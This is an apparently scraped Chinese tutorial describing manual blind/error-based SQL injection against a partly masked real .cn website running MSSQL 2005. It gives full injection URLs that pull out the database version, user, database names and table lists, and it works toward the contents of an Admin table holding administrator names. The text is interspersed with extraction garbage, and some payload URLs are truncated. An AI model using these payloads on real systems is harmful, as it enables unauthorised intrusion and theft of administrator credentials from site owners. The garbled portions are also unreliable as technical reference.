高级手工盲注mssql2005数据库.docx

《高级手工盲注mssql2005数据库.docx》由会员分享，可在线阅读，更多相关《高级手工盲注mssql2005数据库.docx（7页珍藏版）》请在得力文库 - 分享文档赚钱的网站上搜索。

1、我在入侵检测的时候，发现这样的一个注入点。1 J a5 O0 N5 Ahttp:/www*.cn/yth/english/read.php?FileID=31710 经过常规判断确定是注入点。) A0 E; . X! E8 c2 m# | qURL 后面加 报错 URL 后面 AND 1=1 正常 AND 1=2 异常 看 URL 后面加的截图是这样报错的 如图 1从报错中分析，这个数据库应该是 MSSQL 的数据。接下来就是用，ORDER BY 判断索引字符数啦，可是到这就出问题啦，ORDER BY 语句判断不了 报错在用 UNION SELECT 进行判断也 是报错，好像到这没法进行啦。用

2、啦几个比较有名的工具，也是无功而返。其实如果是这样的话，我们还可以试试盲注，毕竟它是有错误回显的。先判断下数据的版本，语句如下。http:/www*.cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%2Bchar(83)%2Bchar(33)%2B(/*/version/*/)%2Bchar(33)%2Bchar(69)%2Bchar(33) 如图 3看见啦吧 数据库是 MSSQL 2005 的 ，大家不知道 char(33)%2Bchar(83)%2Bchar(33)%2B 什么吧， 其实就是!S! %2Bchar(33)%2B

3、char(69)%2Bchar(33)是 !E! 这个意思就是要不报错的信息放在!S! * !E!之间，* 就表示爆出的信息。看看这点是不是和 MYSQL 数据库盲注时， 有点象 。在这点上是共通的。接下来，就是用户名 数据库 啦 用户名语句 如下http:/www*8cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%2Bchar(83)%2Bchar(33)%2B(/*/user/*/)%2Bchar(33)%2Bchar(69)%2Bchar(33) 如图 4用户名 openeduuser爆数据库，语句如下* C; e e5

4、H: ? b% F$ B http:/www*cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%2Bchar(83)%2 Bchar(33)%2B(/*/db_name/*/)%2Bchar(33)%2Bchar(69)%2Bchar(33) 如图 5数据库 openedu 接下来爆出所有数据库的个数 语句如下http:/www*.cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%2Bchar(83)%2Bchar(33)%2B(cast(select/*/count

5、(1)/*/from/*/master.sysdatabases)/*/as/*/varchar(8)%2Bchar(33)%2Bchar(69)%2Bchar(33) 如图 6一共有 16 个表，我就不一一爆啦。语句如下http:/www*.cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%2Bchar(83)%2Bchar(33)%2B(select/*/name/*/from/*/master.dbo.sysdatabases/*/where/*/dbid=16)%2Bchar(33)%2Bchar(69)%2Bchar(3

6、3) 想爆那个库，只要修改 dbid= 的数字即可。现在就来爆openedu 数据库的表的数目吧。语句如下2 K% y F J( L7 + Z5 # Hhttp:/ 7有 543 个 表 看看数据量很大吧 呵呵 接下来就是一个一个表的爆啦 ，语句如下。http:/ 只要依次修改/top/*/1/ 中 1 的位置为其他别的数字就可以爆出其他的表明啦 。经过一翻查找列到 501 个表时，发现 Admin列。语句如下: B8 h5 5 K$ e9 a$ f+ s8 http:/www*.cn/yth/english/read.php?FileID=31710/*/and/*/1=(char(33)%

7、2Bchar(83)%2Bchar(33)%2B(select/*/top/*/1/*/*/name/*/*/from(Select/*/top/*/501/*/id,name/*/from/*/openedu.sysobjects/*/where/*/xtype=0x55/*/*/and/*/name/*/not/*/like/*/0x570043005200540045004D0050002500/*/order/*/by/*/id)/*/T/*/order/*/by/*/id/*/desc)%2Bchar(33)%2Bchar(69)%2Bchar(33) 如图 8紧接着在来爆 Admin 列的内容，语句如下, G( . W, 5 A6 ( Vhttp:/ 如图 9有 4 个字段 接着爆出子这四个字段的内容 最终爆出 AdminName 语句如下6 R“ l. P* |6 W l+ u“ V8 S2 c! a4 L s( l只做技术交流吧 ，本人玩的时间不长，班门弄斧啦 ，大牛不要见笑啦。